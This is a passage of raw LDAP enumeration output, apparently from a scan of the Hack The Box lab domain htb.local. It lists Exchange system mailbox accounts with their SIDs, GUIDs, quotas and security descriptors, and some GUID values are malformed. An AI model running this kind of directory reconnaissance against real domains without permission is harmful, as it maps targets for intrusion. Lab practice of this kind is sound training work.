|         msExchTransportRecipientSettingsFlags: 0
|         msExchDumpsterWarningQuota: 20971520
|         msExchELCMailboxFlags: 130
|         msExchMailboxTemplateLink: CN=ArbitrationMailbox,CN=Retention Policies Container,CN=First Organization,CN=Microsoft Exchange,CN=Services,CN=Configuration,DC=htb,DC=local
|         msExchHideFromAddressLists: TRUE
|         msExchHomeServerName: /o=First Organization/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Configuration/cn=Servers/cn=EXCH01
|         msExchMasterAccountSid: \x01\x01\x00\x00\x00\x00\x00\x05
|         \x00\x00\x00
|         msExchMailboxGuid: \xD8\x14\xC5\x13\xFC\xF4pA\x9C\xA8,\xB1\x03\xB5|\xB4
|         msExchDumpsterQuota: 31457280
|         msExchCalendarLoggingQuota: 6291456
|         msExchUMDtmfMap: emailAddress:797836624526913052927892047252322452711419621
|         msExchUMDtmfMap: lastNameFirstName:6739242777682513052927323243292203259333256342
|         msExchUMDtmfMap: firstNameLastName:6739242777682513052927323243292203259333256342
|         msExchArchiveWarnQuota: 94371840
|         msExchModerationFlags: 6
|         msExchRecipientSoftDeletedStatus: 0
|         msExchUserAccountControl: 2
|         msExchUMEnabledFlags2: -1
|         msExchMailboxFolderSet: 0
|         msExchRecipientDisplayType: 10
|         mDBUseDefaults: FALSE
|         msExchBypassAudit: FALSE
|         msExchMailboxAuditLogAgeLimit: 7776000
|         msExchPoliciesIncluded: f5cca5ec-fafc-4e09-8b7f-be05572cb7cb
|         msExchPoliciesIncluded: {26491cfc-9e50-4857-861b-0cb8df22b5d7}
|         msExchRecipientTypeDetails: 8388608
|         mailNickname: SystemMailbox{1f05a927-89c0-4725-adca-4527114196a1}
|         msExchWhenMailboxCreated: 20190919114715.0Z
|         msExchGroupSecurityFlags: 0
|         msExchAddressBookFlags: 1
|     dn: CN=SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c},CN=Users,DC=htb,DC=local
|         objectClass: top
|         objectClass: person
|         objectClass: organizationalPerson
|         objectClass: user
|         cn: SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c}
|         sn: SystemMailbox bb558c35-97f1-4cb9-8ff7-d53741dc928c
|         distinguishedName: CN=SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c},CN=Users,DC=htb,DC=local
|         instanceType: 4
|         whenCreated: 2019/09/19 11:11:27 UTC
|         whenChanged: 2019/09/19 11:49:31 UTC
|         displayName: Microsoft Exchange
|         uSNCreated: 23782
|         uSNChanged: 24888
|         proxyAddresses: SMTP:SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c}@htb.local
|         name: SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c}
|         objectGUID: c271a7f4-030-f543-a3a4-741abcd8bec3
|         userAccountControl: 514
|         badPwdCount: 0
|         codePage: 0
|         countryCode: 0
|         badPasswordTime: Never
|         lastLogoff: 0
|         lastLogon: Never
|         pwdLastSet: Never
|         primaryGroupID: 513
|         objectSid: 1-5-21-3072663084-364016917-1341370565-1125
|         accountExpires: 30828-09-13T17:57:29+00:00
|         logonCount: 0
|         sAMAccountName: SM_ca8c2ed5bdab4dc9b
|         sAMAccountType: 805306368
|         legacyExchangeDN: /o=First Organization/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=5f90cd7455db492fb2b3b90df3946396-Syste
|         userPrincipalName: SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c}@htb.local
|         objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=htb,DC=local
|         dSCorePropagationData: 2023/12/19 13:49:09 UTC
|         dSCorePropagationData: 2023/12/19 13:49:09 UTC
|         dSCorePropagationData: 2023/12/19 13:49:09 UTC
|         dSCorePropagationData: 2023/12/19 13:49:09 UTC
|         dSCorePropagationData: 1601/01/01 00:00:00 UTC
|         mail: SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c}@htb.local
|         msExchVersion: 1126140425011200
|         msExchProvisioningFlags: 0
|         homeMDB: CN=Mailbox Database 1118319013,CN=Databases,CN=Exchange Administrative Group (FYDIBOHF23SPDLT),CN=Administrative Groups,CN=First Organization,CN=Microsoft Exchange,CN=Services,CN=Configuration,DC=htb,DC=local
|         msExchApprovalApplicationLink: CN=ModeratedRecipients,CN=Approval Applications,CN=First Organization,CN=Microsoft Exchange,CN=Services,CN=Configuration,DC=htb,DC=local
|         msExchApprovalApplicationLink: CN=AutoGroup,CN=Approval Applications,CN=First Organization,CN=Microsoft Exchange,CN=Services,CN=Configuration,DC=htb,DC=local
|         msExchMailboxSecurityDescriptor: \x01\x00\x04\x80\x14\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00,\x00\x00\x00\x01\x01\x00\x00\x00\x00\x00\x05
|         \x00\x00\x00\x01\x01\x00\x00\x00\x00\x00\x05
|         \x00\x00\x00\x04\x00\x1C\x00\x01\x00\x00\x00\x00\x02\x14\x00\x05\x00\x02\x00\x01\x01\x00\x00\x00\x00\x00\x05
|         \x00\x00\x00
|         msExchRequireAuthToSendTo: TRUE
|         msExchArchiveQuota: 104857600
|         msExchMailboxAuditEnable: FALSE
|         msExchTransportRecipientSettingsFlags: 0
|         msExchDumpsterWarningQuota: 20971520
|         msExchELCMailboxFlags: 130
|         msExchMailboxTemplateLink: CN=ArbitrationMailbox,CN=Retention Policies Container,CN=First Organization,CN=Microsoft Exchange,CN=Services,CN=Configuration,DC=htb,DC=local
|         msExchHideFromAddressLists: TRUE
|         msExchHomeServerName: /o=First Organization/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Configuration/cn=Servers/cn=EXCH01
|         msExchMasterAccountSid: \x01\x01\x00\x00\x00\x00\x00\x05
|         \x00\x00\x00
|         msExchMailboxGuid: N\xD2\x15\xDBz\xFD\xE9M\xB5K8b\x1B\xB5     L
|         msExchTextMessagingState: 302120705
|         msExchTextMessagingState: 16842751
|         msExchDumpsterQuota: 31457280
|         msExchCalendarLoggingQuota: 6291456
|         msExchUMDtmfMap: emailAddress:797836624526922558235973142298337353741329282
|         msExchUMDtmfMap: lastNameFirstName:797836624526922558235973142298337353741329282
|         msExchUMDtmfMap: firstNameLastName:797836624526922558235973142298337353741329282
|         msExchArchiveWarnQuota: 94371840
|         msExchModerationFlags: 6
|         msExchCapabilityIdentifiers: 46
|         msExchCapabilityIdentifiers: 52
|         msExchCapabilityIdentifiers: 51
|         msExchCapabilityIdentifiers: 47
|         msExchCapabilityIdentifiers: 44
|         msExchCapabilityIdentifiers: 43
|         msExchCapabilityIdentifiers: 42
|         msExchCapabilityIdentifiers: 40
|         msExchRecipientSoftDeletedStatus: 0
|         msExchUserAccountControl: 2
|         msExchUMEnabledFlags2: -1
|         msExchMailboxFolderSet: 0
|         submissionContLength: 1048576
|         msExchRecipientDisplayType: 10
|         mDBUseDefaults: FALSE
|         msExchBypassAudit: FALSE
|         msExchMailboxAuditLogAgeLimit: 7776000
|         msExchPoliciesIncluded: f5cca5ec-fafc-4e09-8b7f-be05572cb7cb
|         msExchPoliciesIncluded: {26491cfc-9e50-4857-861b-0cb8df22b5d7}
|         msExchOABGeneratingMailboxBL: CN=Default Offline Address Book,CN=Offline Address Lists,CN=Address Lists Container,CN=First Organization,CN=Microsoft Exchange,CN=Services,CN=Configuration,DC=htb,DC=local
|         msExchRecipientTypeDetails: 8388608
|         mailNickname: SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c}
|         msExchWhenMailboxCreated: 20190919114721.0Z
|         msExchGroupSecurityFlags: 0
|         msExchAddressBookFlags: 1
|     dn: CN=SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9},CN=Users,DC=htb,DC=local
|         objectClass: top
|         objectClass: person
|         objectClass: organizationalPerson
|         objectClass: user
|         cn: SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9}
|         sn: MsExchDiscovery e0dc1c29-89c3-4034-b678-e6c29d823ed9
|         distinguishedName: CN=SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9},CN=Users,DC=htb,DC=local
|         instanceType: 4
|         whenCreated: 2019/09/19 11:11:27 UTC
|         whenChanged: 2019/09/19 11:47:29 UTC
|         displayName: Microsoft Exchange
|         uSNCreated: 23787
|         uSNChanged: 24836
|         proxyAddresses: SMTP:SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9}@htb.local
|         name: SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9}
|         objectGUID: 19e3b87e-ca26-1945-b3c-c5583fbd925
|         userAccountControl: 514
|         badPwdCount: 0
|         codePage: 0
|         countryCode: 0
|         badPasswordTime: Never
|         lastLogoff: 0
|         lastLogon: Never
|         pwdLastSet: Never
|         primaryGroupID: 513
|         objectSid: 1-5-21-3072663084-364016917-1341370565-1126
|         accountExpires: 30828-09-13T17:57:29+00:00
|         logonCount: 0
|         sAMAccountName: SM_75a538d3025e4db9a
|         sAMAccountType: 805306368
|         legacyExchangeDN: /o=First Organization/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=44aefc0a94d2429fa20e64cf51b1c537-Syste
|         userPrincipalName: SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9}@htb.local
|         objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=htb,DC=local
|         dSCorePropagationData: 2023/12/19 13:49:09 UTC
|         dSCorePropagationData: 2023/12/19 13:49:09 UTC
|         dSCorePropagationData: 2023/12/19 13:49:09 UTC
|         dSCorePropagationData: 2023/12/19 13:49:09 UTC
|         dSCorePropagationData: 1601/01/01 00:00:00 UTC
|         mail: SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9}@htb.local
|         msExchVersion: 1126140425011200
|         msExchProvisioningFlags: 0
|         homeMDB: CN=Mailbox Database 1118319013,CN=Databases,CN=Exchange Administrative Group (FYDIBOHF23SPDLT),CN=Administrative Groups,CN=First Organization,CN=Microsoft Exchange,CN=Services,CN=Configuration,DC=htb,DC=local
|         msExchMailboxSecurityDescriptor: \x01\x00\x04\x80\x14\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00,\x00\x00\x00\x01\x01\x00\x00\x00\x00\x00\x05
|         \x00\x00\x00\x01\x01\x00\x00\x00\x00\x00\x05
|         \x00\x00\x00\x04\x00\x1C\x00\x01\x00\x00\x00\x00\x02\x14\x00\x05\x00\x02\x00\x01\x01\x00\x00\x00\x00\x00\x05
|         \x00\x00\x00
|         msExchRequireAuthToSendTo: TRUE
|         msExchArchiveQuota: 104857600
|         msExchMailboxAuditEnable: FALSE
|         msExchTransportRecipientSettingsFlags: 0
|         msExchDumpsterWarningQuota: 20971520
|         msExchELCMailboxFlags: 2
|         msExchMailboxTemplateLink: CN=ArbitrationMailbox,CN=Retention Policies Container,CN=First Organization,CN=Microsoft Exchange,CN=Services,CN=Configuration,DC=htb,DC=local
|         msExchHideFromAddressLists: TRUE
|         msExchHomeServerName: /o=First Organization/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Configuration/cn=Servers/cn=EXCH01
|         msExchMasterAccountSid: \x01\x01\x00\x00\x00\x00\x00\x05
|         \x00\x00\x00
|         msExchMailboxGuid: \xAA
|         2\x88\xBF\xA3@K\xB4\x96E\x972\xFD"=
|         msExchDumpsterQuota: 31457280
|         msExchCalendarLoggingQuota: 6291456
|         msExchUMDtmfMap: emailAddress:797836624526930321229892340342678362293823339
|         msExchUMDtmfMap: lastNameFirstName:67392434726837930321229892340342678362293823339
|         msExchUMDtmfMap: firstNameLastName:67392434726837930321229892340342678362293823339
|         msExchArchiveWarnQuota: 94371840
|         msExchModerationFlags: 6
|         msExchCapabilityIdentifiers: 41
|         msExchRecipientSoftDeletedStatus: 0
|         msExchUserAccountControl: 2
|         msExchUMEnabledFlags2: -1
|         msExchMailboxFolderSet: 0
|         msExchRecipientDisplayType: 10
|         mDBUseDefaults: FALSE
|         msExchBypassAudit: FALSE
|         msExchMailboxAuditLogAgeLimit: 7776000
|         msExchPoliciesIncluded: f5cca5ec-fafc-4e09-8b7f-be05572cb7cb
|         msExchPoliciesIncluded: {26491cfc-9e50-4857-861b-0cb8df22b5d7}
|         msExchRecipientTypeDetails: 8388608
|         mailNickname: SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9}
|         msExchWhenMailboxCreated: 20190919114729.0Z
|         msExchGroupSecurityFlags: 0
|         msExchAddressBookFlags: 1
|     dn: CN=DiscoverySearchMailbox {D919BA05-46A6-415f-80AD-7E09334BB852},CN=Users,DC=htb,DC=local
|         objectClass: top
|         objectClass: person
|         objectClass: organizationalPerson
|         objectClass: user
|         cn: DiscoverySearchMailbox {D919BA05-46A6-415f-80AD-7E09334BB852}
|         sn: MsExchDiscoveryMailbox D919BA05-46A6-415f-80AD-7E09334BB852
|         distinguishedName: CN=DiscoverySearchMailbox {D919BA05-46A6-415f-80AD-7E09334BB852},CN=Users,DC=htb,DC=local
|         instanceType: 4
|         whenCreated: 2019/09/19 11:11:27 UTC
|         whenChanged: 2019/09/19 11:48:40 UTC
|         displayName: Discovery Search Mailbox
|         uSNCreated: 23792
|         uSNChanged: 24875
|         proxyAddresses: SMTP:DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}@htb.local
|         name: DiscoverySearchMailbox {D919BA05-46A6-415f-80AD-7E09334BB852}
|         objectGUID: 1c1af25-7ae0-c54e-b51c-ade57a648c
|         userAccountControl: 514
|         badPwdCount: 0
|         codePage: 0
|         countryCode: 0
|         badPasswordTime: Never
|         lastLogoff: 0
|         lastLogon: Never
|         pwdLastSet: Never
|         primaryGroupID: 513
|         objectSid: 1-5-21-3072663084-364016917-1341370565-1127
|         accountExpires: 30828-09-13T17:57:29+00:00
|         logonCount: 0
|         sAMAccountName: SM_681f53d4942840e18
|         sAMAccountType: 805306368
|         showInAddressBook: CN=All Mailboxes(VLV),CN=All System Address Lists,CN=Address Lists Container,CN=First Organization,CN=Microsoft Exchange,CN=Services,CN=Configuration,DC=htb,DC=local
|         showInAddressBook: CN=All Recipients(VLV),CN=All System Address Lists,CN=Address Lists Container,CN=First Organization,CN=Microsoft Exchange,CN=Services,CN=Configuration,DC=htb,DC=local
|         legacyExchangeDN: /o=First Organization/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=4603f8b937e84923b718670f87760b7b-Disco
|         userPrincipalName: DiscoverySearchMailbox {D919BA05-46A6-415f-80AD-7E09334BB852}@htb.local
|         objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=htb,DC=local
|         dSCorePropagationData: 2023/12/19 13:49:09 UTC
|         dSCorePropagationData: 2023/12/19 13:49:09 UTC
|         dSCorePropagationData: 2023/12/19 13:49:09 UTC
|         dSCorePropagationData: 2023/12/19 13:49:09 UTC
|         dSCorePropagationData: 1601/01/01 00:00:00 UTC
|         mail: DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}@htb.local
|         msExchVersion: 88218628259840
|         mDBOverHardQuotaLimit: 52428800
|         authOrigBL: CN=DiscoverySearchMailbox {D919BA05-46A6-415f-80AD-7E09334BB852},CN=Users,DC=htb,DC=local
|         msExchProvisioningFlags: 0
|         homeMDB: CN=Mailbox Database 1118319013,CN=Databases,CN=Exchange Administrative Group (FYDIBOHF23SPDLT),CN=Administrative Groups,CN=First Organization,CN=Microsoft Exchange,CN=Services,CN=Configuration,DC=htb,DC=local
|         msExchMailboxSecurityDescriptor: \x01\x00\x04\x8C\x14\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00,\x00\x00\x00\x01\x01\x00\x00\x00\x00\x00\x05
|         \x00\x00\x00\x01\x01\x00\x00\x00\x00\x00\x05
|         \x00\x00\x00\x04\x00@\x00\x02\x00\x00\x00\x00\x02\x14\x00\x01\x00\x02\x00\x01\x01\x00\x00\x00\x00\x00\x05
|         \x00\x00\x00\x00\x02$\x00\x01\x00\x00\x00\x01\x05\x00\x00\x00\x00\x00\x05\x15\x00\x00\x00,\x1E%\xB7\x15u\xB2\x15\xC5\xB0\xF3OW\x04\x00\x00
|         msExchArchiveQuota: 104857600
|         msExchMailboxAuditEnable: FALSE
|         delivContLength: 102400
|         authOrig: CN=DiscoverySearchMailbox {D919BA05-46A6-415f-80AD-7E09334BB852},CN=Users,DC=htb,DC=local
|         msExchTransportRecipientSettingsFlags: 0
|         msExchDumpsterWarningQuota: 20971520
|         msExchELCMailboxFlags: 134
|         msExchHideFromAddressLists: TRUE
|         msExchHomeServerName: /o=First Organization/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Configuration/cn=Servers/cn=EXCH01
|         mDBOverQuotaLimit: 52428800
|         msExchMasterAccountSid: \x01\x01\x00\x00\x00\x00\x00\x05
|         \x00\x00\x00
|         msExchRBACPolicyLink: CN=Default Role Assignment Policy,CN=Policies,CN=RBAC,CN=First Organization,CN=Microsoft Exchange,CN=Services,CN=Configuration,DC=htb,DC=local
|         msExchMailboxGuid: \xB7,\x8A[Sv\xAEA\xB7bu\xB1\x16\xE8u\xD2
|         msExchDumpsterQuota: 31457280
|         msExchCalendarLoggingQuota: 6291456
|         msExchUMDtmfMap: emailAddress:347268379732724624526939192205462641538023730933422852
|         msExchUMDtmfMap: lastNameFirstName:673924347268379624526939192205462641538023730933422852
|         msExchUMDtmfMap: firstNameLastName:673924347268379624526939192205462641538023730933422852
|         msExchArchiveWarnQuota: 94371840
|         msExchModerationFlags: 6
|         msExchRecipientSoftDeletedStatus: 0
|         msExchUserAccountControl: 2
|         msExchUMEnabledFlags2: -1
|         msExchMailboxFolderSet: 0
|         submissionContLength: 102400
|         mDBUseDefaults: FALSE
|         msExchBypassAudit: FALSE
|         msExchMailboxAuditLogAgeLimit: 7776000
|         msExchPoliciesIncluded: f5cca5ec-fafc-4e09-8b7f-be05572cb7cb
|         msExchPoliciesIncluded: {26491cfc-9e50-4857-861b-0cb8df22b5d7}
|         msExchRecipientTypeDetails: 536870912
|         mailNickname: DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}
|         msExchWhenMailboxCreated: 20190919114736.0Z
|         msExchGroupSecurityFlags: 0
|         msExchAddressBookFlags: 1
|     dn: CN=Migration.8f3e7716-2011-43e4-96b1-aba62d229136,CN=Users,DC=htb,DC=local
|         objectClass: top
|         objectClass: person
|         objectClass: organizationalPerson
|         objectClass: user
|         cn: Migration.8f3e7716-2011-43e4-96b1-aba62d229136
|         sn: Migration.8f3e7716-2011-43e4-96b1-aba62d229136
|         distinguishedName: CN=Migration.8f3e7716-2011-43e4-96b1-aba62d229136,CN=Users,DC=htb,DC=local
|         instanceType: 4
|         whenCreated: 2019/09/19 11:11:27 UTC
|         whenChanged: 2019/09/19 11:47:42 UTC
|         displayName: Microsoft Exchange Migration
|         uSNCreated: 23797
|         uSNChanged: 24846
|         proxyAddresses: SMTP:Migration.8f3e7716-2011-43e4-96b1-aba62d229136@htb.local
|         name: Migration.8f3e7716-2011-43e4-96b1-aba62d229136
|         objectGUID: edd456b3-8384-c4b-9566-e9a98858a516
|         userAccountControl: 514
|         badPwdCount: 0
|         codePage: 0
|         countryCode: 0
|         badPasswordTime: Never
|         lastLogoff: 0
|         lastLogon: Never
|         pwdLastSet: Never
|         primaryGroupID: 513
|         objectSid: 1-5-21-3072663084-364016917-1341370565-1128
|         accountExpires: 30828-09-13T17:57:29+00:00
|         logonCount: 0
|         sAMAccountName: SM_1b41c9286325456bb
|         sAMAccountType: 805306368
|         legacyExchangeDN: /o=First Organization/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=57e7055a5ddd483c8abc1df53105efc9-Migra
|         userPrincipalName: Migration.8f3e7716-2011-43e4-96b1-aba62d229136@htb.local
|         objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=htb,DC=local
|         dSCorePropagationData: 2023/12/19 13:49:09 UTC
|         dSCorePropagationData: 2023/12/19 13:49:09 UTC
|         dSCorePropagationData: 2023/12/19 13:49:09 UTC
|         dSCorePropagationData: 2023/12/19 13:49:09 UTC
|         dSCorePropagationData: 1601/01/01 00:00:00 UTC
|         mail: Migration.8f3e7716-2011-43e4-96b1-aba62d229136@htb.local
|         msExchVersion: 1126140425011200
|         mDBOverHardQuotaLimit: 307200
|         msExchProvisioningFlags: 0
|         homeMDB: CN=Mailbox Database 1118319013,CN=Databases,CN=Exchange Administrative Group (FYDIBOHF23SPDLT),CN=Administrative Groups,CN=First Organization,CN=Microsoft Exchange,CN=Services,CN=Configuration,DC=htb,DC=local
|         mDBStorageQuota: 153600
|         msExchMailboxSecurityDescriptor: \x01\x00\x04\x80\x14\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00,\x00\x00\x00\x01\x01\x00\x00\x00\x00\x00\x05
|         \x00\x00\x00\x01\x01\x00\x00\x00\x00\x00\x05
|         \x00\x00\x00\x04\x00\x1C\x00\x01\x00\x00\x00\x00\x02\x14\x00\x05\x00\x02\x00\x01\x01\x00\x00\x00\x00\x00\x05
|         \x00\x00\x00
|         msExchRequireAuthToSendTo: TRUE
|         msExchArchiveQuota: 104857600
|         msExchMailboxAuditEnable: FALSE
|         msExchTransportRecipientSettingsFlags: 0
|         msExchMessageHygieneSCLRejectThreshold: 7
|         msExchDumpsterWarningQuota: 20971520
|         msExchELCMailboxFlags: 130
|         msExchHideFromAddressLists: TRUE
|         msExchHomeServerName: /o=First Organization/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Configuration/cn=Servers/cn=EXCH01
|         mDBOverQuotaLimit: 307200
|         msExchMasterAccountSid: \x01\x01\x00\x00\x00\x00\x00\x05
|         \x00\x00\x00
|         msExchMessageHygieneSCLQuarantineThreshold: 9
|         msExchMailboxGuid: \xB3+\x93Xv\x04\xB9C\x92'\xA2\xF4B`t\xC0
|         msExchMessageHygieneSCLJunkThreshold: 4
|         msExchDumpsterQuota: 31457280
|         msExchCalendarLoggingQuota: 6291456
|         msExchUMDtmfMap: emailAddress:64472846683337716201143349621222623229136
|         msExchUMDtmfMap: lastNameFirstName:64472846683337716201143349621222623229136
|         msExchUMDtmfMap: firstNameLastName:64472846683337716201143349621222623229136
|         msExchArchiveWarnQuota: 94371840
|         msExchModerationFlags: 6
|         msExchCapabilityIdentifiers: 48
|         msExchRecipientSoftDeletedStatus: 0
|         msExchUserAccountControl: 2
|         msExchUMEnabledFlags2: -1
|         msExchMailboxFolderSet: 0
|         msExchMessageHygieneSCLDeleteThreshold: 9
|         msExchRecipientDisplayType: 10
|         mDBUseDefaults: FALSE
|         msExchBypassAudit: FALSE
|         msExchMailboxAuditLogAgeLimit: 7776000
|         msExchPoliciesIncluded: f5cca5ec-fafc-4e09-8b7f-be05572cb7cb
|         msExchPoliciesIncluded: {26491cfc-9e50-4857-861b-0cb8df22b5d7}
|         msExchRecipientTypeDetails: 8388608
|         mailNickname: Migration.8f3e7716-2011-43e4-96b1-aba62d229136
|         msExchWhenMailboxCreated: 20190919114742.0Z
|         msExchGroupSecurityFlags: 0
|         msExchAddressBookFlags: 1
|     dn: CN=FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042,CN=Users,DC=htb,DC=local
|         objectClass: top
|         objectClass: person
|         objectClass: organizationalPerson
|         objectClass: user
|         cn: FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042
|         sn: FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042
|         distinguishedName: CN=FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042,CN=Users,DC=htb,DC=local
|         instanceType: 4
|         whenCreated: 2019/09/19 11:11:27 UTC
|         whenChanged: 2019/09/19 11:47:48 UTC
|         displayName: Microsoft Exchange Federation Mailbox
|         uSNCreated: 23802
|         uSNChanged: 24851
|         proxyAddresses: SMTP:FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042@htb.local
|         name: FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042
|         objectGUID: 52be9726-123f-d14f-a13a-a5235a31e587
|         userAccountControl: 514
|         badPwdCount: 0
|         codePage: 0
|         countryCode: 0
|         badPasswordTime: Never
|         lastLogoff: 0
|         lastLogon: Never
|         pwdLastSet: Never
|         primaryGroupID: 513
|         objectSid: 1-5-21-3072663084-364016917-1341370565-1129
|         accountExpires: 30828-09-13T17:57:29+00:00
|         logonCount: 0
|         sAMAccountName: SM_9b69f1b9d2cc45549
|         sAMAccountType: 805306368
|         legacyExchangeDN: /o=First Organization/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=1e107e142f7341cc8acb1597635d96e0-Feder
|         userPrincipalName: FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042@htb.local
|         objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=htb,DC=local
|         dSCorePropagationData: 2023/12/19 13:49:09 UTC
|         dSCorePropagationData: 2023/12/19 13:49:09 UTC
|         dSCorePropagationData: 2023/12/19 13:49:09 UTC
|         dSCorePropagationData: 2023/12/19 13:49:09 UTC
|         dSCorePropagationData: 1601/01/01 00:00:00 UTC
|         mail: FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042@htb.local
|         msExchVersion: 1126140425011200
|         mDBOverHardQuotaLimit: 1024
|         msExchProvisioningFlags: 0
|         homeMDB: CN=Mailbox Database 1118319013,CN=Databases,CN=Exchange Administrative Group (FYDIBOHF23SPDLT),CN=Administrative Groups,CN=First Organization,CN=Microsoft Exchange,CN=Services,CN=Configuration,DC=htb,DC=local
|         mDBStorageQuota: 1024
|         msExchMailboxSecurityDescriptor: \x01\x00\x04\x80\x14\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00,\x00\x00\x00\x01\x01\x00\x00\x00\x00\x00\x05
|         \x00\x00\x00\x01\x01\x00\x00\x00\x00\x00\x05
|         \x00\x00\x00\x04\x00\x1C\x00\x01\x00\x00\x00\x00\x02\x14\x00\x05\x00\x02\x00\x01\x01\x00\x00\x00\x00\x00\x05
|         \x00\x00\x00
|         msExchArchiveQuota: 104857600
|         msExchMailboxAuditEnable: FALSE
|         msExchTransportRecipientSettingsFlags: 0
|         msExchMessageHygieneSCLRejectThreshold: 7
|         msExchDumpsterWarningQuota: 20971520
|         msExchELCMailboxFlags: 130
|         msExchHideFromAddressLists: TRUE
|         msExchHomeServerName: /o=First Organization/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Configuration/cn=Servers/cn=EXCH01
|         mDBOverQuotaLimit: 1024
|         msExchMasterAccountSid: \x01\x01\x00\x00\x00\x00\x00\x05
|         \x00\x00\x00
|         msExchMessageHygieneSCLQuarantineThreshold: 9
|         msExchMailboxGuid: |?\x7F?\xD5!\x17K\xA2\x10(H\xF1\x169@
|         msExchMessageHygieneSCLJunkThreshold: 4
|         msExchDumpsterQuota: 31457280
|         msExchCalendarLoggingQuota: 6291456
|         msExchUMDtmfMap: emailAddress:3333728333624542134382817941489323002953213042
|         msExchUMDtmfMap: lastNameFirstName:3333728333624542134382817941489323002953213042
|         msExchUMDtmfMap: firstNameLastName:3333728333624542134382817941489323002953213042
|         msExchArchiveWarnQuota: 94371840
|         msExchRMSComputerAccountsLink: CN=EXCH01,CN=Computers,DC=htb,DC=local
|         msExchModerationFlags: 6
|         msExchRecipientSoftDeletedStatus: 0
|         msExchUserAccountControl: 2
|         msExchUMEnabledFlags2: -1
|         msExchMailboxFolderSet: 0
|         msExchMessageHygieneSCLDeleteThreshold: 9
|         msExchRecipientDisplayType: 10
|         mDBUseDefaults: FALSE
|         msExchBypassAudit: FALSE
|         msExchMailboxAuditLogAgeLimit: 7776000
|         msExchPoliciesIncluded: f5cca5ec-fafc-4e09-8b7f-be05572cb7cb
|         msExchPoliciesIncluded: {26491cfc-9e50-4857-861b-0cb8df22b5d7}
|         msExchRecipientTypeDetails: 8388608
|         mailNickname: FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042
|         msExchWhenMailboxCreated: 20190919114748.0Z
|         msExchGroupSecurityFlags: 0
|         msExchAddressBookFlags: 1
|     dn: CN=SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201},CN=Users,DC=htb,DC=local
|         objectClass: top
|         objectClass: person
|         objectClass: organizationalPerson
|         objectClass: user
|         cn: SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}
|         sn: SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}
|         distinguishedName: CN=SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201},CN=Users,DC=htb,DC=local
|         instanceType: 4
|         whenCreated: 2019/09/19 11:11:27 UTC
|         whenChanged: 2019/09/19 11:47:55 UTC
|         displayName: E4E Encryption Store - Active
|         uSNCreated: 23807
|         uSNChanged: 24860
|         proxyAddresses: SMTP:SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}@htb.local
|         name: SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}
|         objectGUID: 153cf762-a55c-bb44-a390-f1d6890ccdf
|         userAccountControl: 514
|         badPwdCount: 0
|         codePage: 0
|         countryCode: 0
|         badPasswordTime: Never
|         lastLogoff: 0
|         lastLogon: Never
|         pwdLastSet: Never
|         primaryGroupID: 513
|         objectSid: 1-5-21-3072663084-364016917-1341370565-1130
|         accountExpires: 30828-09-13T17:57:29+00:00
|         logonCount: 0
|         sAMAccountName: SM_7c96b981967141ebb
|         sAMAccountType: 805306368
|         legacyExchangeDN: /o=First Organization/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=7faef2597f78442cb92fa80bfa3fe4ad-Syste
